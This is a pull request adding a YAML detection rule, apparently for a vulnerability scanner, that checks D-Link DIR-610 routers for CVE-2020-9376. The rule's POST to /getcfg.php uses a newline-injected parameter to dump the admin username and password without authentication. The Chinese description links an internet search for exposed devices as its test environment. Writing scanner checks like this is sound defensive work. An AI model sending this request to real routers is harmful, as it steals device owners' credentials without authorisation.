### PR TITLE
Create dlink-cve-2020-9376-dump-credentials.yml

### DIFF
--- a/pocs/dlink-cve-2020-9376-dump-credentials.yml
+++ b/pocs/dlink-cve-2020-9376-dump-credentials.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-dlink-cve-2020-9376-dump-credentials
+rules:
+  - method: POST
+    path: /getcfg.php
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
+    expression: >
+      response.status == 200 && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
+detail:
+  author: x1n9Qi8
+  Affected Version: "Dlink DIR-610"
+  links:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Dlink的DIR-610路由器可以未授权访问文件，获取路由器管理界面的账号密码
## 测试环境
https://fofa.so/result?qbase64=YXBwPSJEX0xJTkstRElSLTYxME4rIg%3D%3D
## 备注
detail:
  author: x1n9Qi8
  links:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376